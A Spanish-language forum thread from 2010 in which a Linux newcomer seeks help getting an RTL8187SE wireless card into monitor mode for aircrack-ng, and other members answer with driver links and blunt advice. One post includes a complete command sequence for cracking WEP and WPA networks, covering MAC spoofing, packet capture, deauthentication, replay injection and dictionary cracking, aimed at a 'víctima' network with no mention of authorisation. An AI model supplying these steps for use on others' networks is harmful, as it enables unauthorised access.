?>/script>'; } ?> Ubuntu y drivers RTL8187 Widgets Magazine

Autor Tema: Ubuntu y drivers RTL8187  (Leído 9856 veces)

0 Usuarios y 1 Visitante están viendo este tema.

sbarrio

  • Visitante
Ubuntu y drivers RTL8187
« en: 02-02-2010, 14:04 (Martes) »
Hola buenas,

Escribo pidiendo consejo. Me explico, llevo una semana peleado con la tarjeta de red de mi portatil y desesperado me he decidido a comprar una tarjeta USB que sea compatible con aircrack en windows 7 y ubuntu 9.10.

Mi sorpresa ha venido al ver que se recomienda la compra de esta tarjeta que vienen con el chip RTL8187, que es el mismo que tengo en la tarjeta de mi portatil Advent 4211B. El mismo el mismo no se si es, concretamente mi tarjeta es una RTL 8187SE y no la consejo poner en modo monitor  ni que inyecte. He probado con ubunto 9.10, con windows 7 y commview, con wifislax y con wifiway para netbook.

¿si compro esta tarjeta tendré que seguir con mi pelea?

Si es asi me ahorrare el gasto y les agradeceria que me recomendaran algun producto que al que no sea necesario educar el controlador ni para windows ni para linux(ubuntu 9.10).

Gracias por la atención y quedo a la espera de vuestros consejos de compra o de configuarción de mi tarjeta actual.

uNbAs

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #1 en: 02-02-2010, 20:07 (Martes) »
De ese chipset RTL8187 existen 3 versiones la L, B y SE, todas pueden funcionar al menos bajo linux, aunque aircrack no tiene nada que ver en esto dado que es con airodump con el programa que realmente han de ser compatibles, dado que aircrack es un simple analizador de datos o "Cracker" (como le llaman los chicos malos)

El caso es que las 3 funcionan bajo linux, yo me olvidaria de usar windows para eso .... Lo unico que tendras que hacer es instalar los drivers necesarios para ello

sbarrio

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #2 en: 02-02-2010, 20:51 (Martes) »
De ese chipset RTL8187 existen 3 versiones la L, B y SE, todas pueden funcionar al menos bajo linux, aunque aircrack no tiene nada que ver en esto dado que es con airodump con el programa que realmente han de ser compatibles, dado que aircrack es un simple analizador de datos o "Cracker" (como le llaman los chicos malos)

El caso es que las 3 funcionan bajo linux, yo me olvidaria de usar windows para eso .... Lo unico que tendras que hacer es instalar los drivers necesarios para ello

Gracias por tus comentarios.

He probado infinidad de drivers y no he conseguido resultados. Puede ser poruq no estoy muy ducho en linux o por no acertar con el sitio y el driver(parche) que solucione mis problemas.

¿Podrías orientarme o dirigirme?

En la consola cuando hago iwconfig me dice que utiliza el driver 8180 en vez del 8187.

Gracias de nuevo.


uNbAs

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #3 en: 02-02-2010, 23:51 (Martes) »
Si, sin problema, aqui tienes la pagina de informacion/descarga

http://rtl8180-sa2400.sourceforge.net/

Por lo que he podido ver estan en experimental como los terminados en B

Si no consigues hacerlo funcionar como una RTL8187L es muy posible que funcione como una 8180, puedes hacer un lspci para obtener mas informacion o un dmesg y pegar aqui los resultados o mejor en el sitio correspondiente del foro  ;)

sbarrio

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #4 en: 03-02-2010, 15:16 (Miércoles) »
Si, sin problema, aqui tienes la pagina de informacion/descarga

http://rtl8180-sa2400.sourceforge.net/

Por lo que he podido ver están en experimental como los terminados en B

Si no consigues hacerlo funcionar como una RTL8187L es muy posible que funcione como una 8180, puedes hacer un lspci para obtener mas informacion o un dmesg y pegar aqui los resultados o mejor en el sitio correspondiente del foro  ;)

Gracias pero no ha funcianado.

¿que tarjeta me usb me recomendarias para mi advent 4211B?

Necesito una que la enchufe y cuando haga airmong-ng start wlan0 me diga en que mon estoy.

Lo único que he conseguido con la que viene integrada en mi netbook  es que se ponga en modo monitor pero no me dice en cual de ellos.

Estoy decidido a comprar una y me gustaría que me recomendaras una para usarla con ubuntu 9.10 netbook remix.

Muchas gracias por tu ayuda.

orion999

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #5 en: 03-02-2010, 16:10 (Miércoles) »
Si, sin problema, aqui tienes la pagina de informacion/descarga

http://rtl8180-sa2400.sourceforge.net/

Por lo que he podido ver están en experimental como los terminados en B

Si no consigues hacerlo funcionar como una RTL8187L es muy posible que funcione como una 8180, puedes hacer un lspci para obtener mas informacion o un dmesg y pegar aqui los resultados o mejor en el sitio correspondiente del foro  ;)

Gracias pero no ha funcianado.



Necesito una que la enchufe y cuando haga airmong-ng start wlan0 me diga en que mon estoy.

Lo único que he conseguido con la que viene integrada en mi netbook  es que se ponga en modo monitor pero no me dice en cual de ellos.



 ???

Unbas te esta dando la solucion,como que no ha funcionado?
Si, sin problema, aqui tienes la pagina de informacion/descarga

http://rtl8180-sa2400.sourceforge.net/

Por lo que he podido ver estan en experimental como los terminados en B

Si no consigues hacerlo funcionar como una RTL8187L es muy posible que funcione como una 8180, puedes hacer un lspci para obtener mas informacion o un dmesg y pegar aqui los resultados

Post Merge: 03-02-2010, 16:13 (Miércoles)
Se han molestado en darte una soluccion y creo que ni siquiera lo has intentado

Sobre tarjetas usb hay mucho escrito en su seccion correspondiente
« Última modificación: 03-02-2010, 16:13 (Miércoles) por orion999 »

uNbAs

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #6 en: 03-02-2010, 21:25 (Miércoles) »
Creo que el problema mas que en la tarjeta esta en que TODOS quereis correr antes de saber andar.

Wlan0 es un tipo de interfaz existen chorrocientas mil ifaces, si dejaseis de leer y ocecaros al 100% con los guiaburros aprendeiais a hacer las cosas por vosotros mismos.

Es mas el/los chipset RTL8187 nisiquiera necesitan usar el arimon-ng (Programa que lo unico que facilita es evitar poner iwconfig [iface] mode monitor) teniendo que teclear arimon-ng start [interface]

*[Interface] Vease como comando para definir la interfaz deseada y NO como comando real.


Desconectado drvalium

  • *******
  • Mensajes: 17370
  • Misántropo
Re: Ubuntu y drivers RTL8187
« Respuesta #7 en: 04-02-2010, 03:10 (Jueves) »
Creo que el problema mas que en la tarjeta esta en que TODOS quereis correr antes de saber andar.

¿que mas añadir? >:( >:( >:(

sbarrio

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #8 en: 04-02-2010, 13:26 (Jueves) »
Creo que el problema mas que en la tarjeta esta en que TODOS quereis correr antes de saber andar.

Wlan0 es un tipo de interfaz existen chorrocientas mil ifaces, si dejaseis de leer y ocecaros al 100% con los guiaburros aprendeiais a hacer las cosas por vosotros mismos.

Es mas el/los chipset RTL8187 nisiquiera necesitan usar el arimon-ng (Programa que lo unico que facilita es evitar poner iwconfig [iface] mode monitor) teniendo que teclear arimon-ng start [interface]

*[Interface] Vease como comando para definir la interfaz deseada y NO como comando real.


Hola compañeros foreros y ante todo muchas gracias por la ayuda que mes estáis prestando.
Según os leo me estoy dando cuenta de que estoy aplicando métodos leídos en foros y que no tienen por que ser útiles para mi problema. Esto seguramente es cierto ya que me decidí a empezar utilizar Linux(Ubuntu) no hace más de un mes y como es lógico me queda mucho por aprender y aun no se muy bien por donde me ando.

Como os comento soy muy nuevo en linux y aun mucho más en la desencriptacion wep y wpa.
Mi experiencia empezó hace ocho días cuando en un sobremesa probé las instrucciones que se daban en un foro y que eran las siguientes:

1- sudo apt-get install aircrack-ng
2- sudo apt-get install macchanger
Apago las conexiones inalambricas
3- Activo el modo monitor en la tarjeta de red
 sudo airmon-ng start wlan0
Me sale que se activo en mon0, asi es que trabajo con mon0
4- Doy de Baja mon0
sudo ifconfig mon0 down
5- Cambio la dirección mac de mon0 por 00:11:22:33:44:55
sudo macchanger -m 00:11:22:33:44:55 mon0
6- Doy de alta mon0
sudo ifconfig mon0 up
7- Escaneo las redes disponibles, y encuentro mi víctima
sudo airodump-ng mon0
- Detengo la escaneada pulsando [la tecla control+c]
8- Ejecuto airodump-ng, cambiando los datos de los corchetes por los de mi víctima
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
Abro otra terminal SIN CERRAR LA ANTERIOR y empiezo el ataque a la red
9- Cambiando los datos de los corchetes por los de nuestra victima
PARA WEP
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0
TERCERA TERMINAL
10- Abro otra terminal SIN CERRAR LA ANTERIOR y ejecuto en una nueva terminal cambiando los datos de los corchetes por los de nuestra victima.
PARA WEP
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0
- Le decimos que si (y) y le damos enter
PARA WPA
sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
-Descarga del diccionario para WPA
CUARTA TERMINAL
PARA WEP
*** sudo aircrack-ng -z [nombre red]*.cap


Estos son los pasos que sigo en mi sobremesa y sin problema.
Mis problemas empezaron cuando intente en mismo proceso en mi Advent 4211b y es que al poner la tarjeta en modo monitor me sale lo siguiente:
Código: [Seleccionar]
Interface Chipset Driver
wlan0 RTL8180/RTL8185 r8180 (monitor mode enabled)
Se me pone en modo monitor, pero no me dice en que mon.
Llegado aquí y viendo que el driver que utilizaba mi tarjeta no era el que tendría que ser, o eso creo, el RTL8187se, me puse a buscar en el foro de seguridad wireless como actualizar mi controlador y he seguido todos los pasos al dedillo sin conseguir nada.

Posteriormente recurrí a la web de aircrack.es y seguí todos los pasos de su foro y tampoco conseguí que se mostrara el mon ni tampoco conseguí asociar mi conexión con la victima seleccionada con airdump-ng.

Posteriormente seguí las indicaciones que se me han brindado en este hilo y tampoco he conseguido los resultados que esperaba.

Cambien he probado con todos los paso indicados en http://wireless.kernel.org/en/users/Drivers/rtl8187#Features y después de actualizar el kernel wireles y las librerías tampoco consigo resultados.
Como veis no os miento, cuando os digo que lo estoy probando todo y no consigo resultados con mi tarjeta de red rtl8187se, ni con el driver original ni con los parcheados ni con nada.

Esta claro por lo que me comentáis, que tiene que haber multitud de cosas que no estoy haciendo bien, pero mis conocimientos a día de hoy en linux no me dan para más y es por ello que os pedí consejo en este hilo del foro, bien para solucionar mi problema con mi tarjeta o bien para que me aconsejarais una tarjeta ubs que funcione sin tener que parchearla en ubuntu.

No se si esta conversación la tendríamos que mantener en este hilo o si por lo contrario seria conveniente abrir uno nuevo.

Agradecería de veras que me orientarais en que es lo que hago mal y si existen otros métodos para desencriptar wep y wpa sin que se me muestre el mon en el que se esta trabajando.
Cambien he probado con wifislax y en mi netbook ni si quiera arranca dándome un mensaje de que le falta un comando chroot o algo parecido.

Cambien he probado con wifiway 1 Final para netbook y no me reconocía ni las redes inalámbricas ni la red de cable. Le metí el driver y me las reconoció pero sin poder inyectar paquetes.
Perdonar por el ladrillo, pero no quería que creyerais que no me lo había trabajado antes de pasar por este hilo a preguntaros.


uNbAs

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #9 en: 04-02-2010, 20:25 (Jueves) »
Citar
Perdonar por el ladrillo, pero no quería que creyerais que no me lo había trabajado antes de pasar por este hilo a preguntaros.

Los ladrillos molan  ;D, aunque no te lo creas dan mucha informacion

Soy de las personas que prefiere no dar detalles pero ayudar a comprender por que pasan las cosas. EL primer fallo esta en seguir guiaburros, si sigues manuales de 1,2,3,4,5 solo haras esos pasos y en cuanto falle algo o no sea como dicen pensaras que tienes "problemas" Muchas veces la misma persona que ha escrito ese texto si le sacas de los mismos pasos se lia ...

Pregunta ¿Quien te dice a ti que tengas que tener un iface m0no? ¿Por que?

Otra de las cosas que me asombra es:

Citar
Como os comento soy muy nuevo en linux

¿Leer sabes? ¿ingles entiendes? ¿que quiere decir la frase "monitor mode enabled"?

Segun mi ingles y el del sr.academico San Google, Modo monitor abierto/encendido/activado ¿has caido en la cuenta?

A veces soy un poco brusco contestando pero no lo hago a mala fé, cuando lo hago se nota, pero de todas formas sigo diciendo que quereis correr antes de caminar.

Para poder seguir las tecnicas de 1,2,3,4,5 primero hay que:

1º Entender lo que se esta haciendo

2º Entender lo que se va a hacer

3º Analizar si lo que se cree comprendido es correcto y sobre todo si tiene sentido

4º (Como con las mujeres) Tener unos preliminares

5º La prueba de fuego, intentarlo hasta que funcione y entender a que pueden ser debidos los errores.

Si miras mis primeros mensajes, son de risa, pero comprendi que primero hay que dedicarle mucho tiempo de estudio y antiguamente la unica forma de hacerlo era leyendo de verdad, nada de guiaburros y en el fondo lo agradezco.

PD: En cuanto contestes a este post, lo divido y lo muevo a la Zona GNU/Linux que es donde deberia de estar  ;)
« Última modificación: 04-02-2010, 20:27 (Jueves) por uNbAs »

sbarrio

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #10 en: 05-02-2010, 09:48 (Viernes) »
Citar
Perdonar por el ladrillo, pero no quería que creyerais que no me lo había trabajado antes de pasar por este hilo a preguntaros.

Los ladrillos molan  ;D, aunque no te lo creas dan mucha informacion

Soy de las personas que prefiere no dar detalles pero ayudar a comprender por que pasan las cosas. EL primer fallo esta en seguir guiaburros, si sigues manuales de 1,2,3,4,5 solo haras esos pasos y en cuanto falle algo o no sea como dicen pensaras que tienes "problemas" Muchas veces la misma persona que ha escrito ese texto si le sacas de los mismos pasos se lia ...

Pregunta ¿Quien te dice a ti que tengas que tener un iface m0no? ¿Por que?

Otra de las cosas que me asombra es:

Citar
Como os comento soy muy nuevo en linux

¿Leer sabes? ¿ingles entiendes? ¿que quiere decir la frase "monitor mode enabled"?

Segun mi ingles y el del sr.academico San Google, Modo monitor abierto/encendido/activado ¿has caido en la cuenta?

A veces soy un poco brusco contestando pero no lo hago a mala fé, cuando lo hago se nota, pero de todas formas sigo diciendo que quereis correr antes de caminar.

Para poder seguir las tecnicas de 1,2,3,4,5 primero hay que:

1º Entender lo que se esta haciendo

2º Entender lo que se va a hacer

3º Analizar si lo que se cree comprendido es correcto y sobre todo si tiene sentido

4º (Como con las mujeres) Tener unos preliminares

5º La prueba de fuego, intentarlo hasta que funcione y entender a que pueden ser debidos los errores.

Si miras mis primeros mensajes, son de risa, pero comprendi que primero hay que dedicarle mucho tiempo de estudio y antiguamente la unica forma de hacerlo era leyendo de verdad, nada de guiaburros y en el fondo lo agradezco.

PD: En cuanto contestes a este post, lo divido y lo muevo a la Zona GNU/Linux que es donde deberia de estar  ;)

Ok y gracias por tu respuesta.

He sacado en claro que ya tengo mi tarjeta en modo monitor y que no necesito saber en que mon esta.

Dejare de pelearme con el driver de la tarjeta y me centrare en entender y comprender el proceso de desencriptación con mi tarjeta.

Agradezco mucho tus orientaciones y solamente me queda pedirte que me recomiendes literatura para formarme y empezar a comprender procesos.

De momento y gracias a vosotros, me olvidare de comprar otra tarjeta y seguiré intentando hacerme con la mía.

uNbAs

  • Visitante
Re: Ubuntu y drivers RTL8187
« Respuesta #11 en: 05-02-2010, 19:52 (Viernes) »
Hombre si quieres comprarte una tarjeta puedes hacerlo sin ningún problema además ganaras en movilidad por lo que nunca esta de mas tener una en el cajón. Pero en principio no deberías de necesitarla

en cuanto llegue a casa te dejo unos enlaces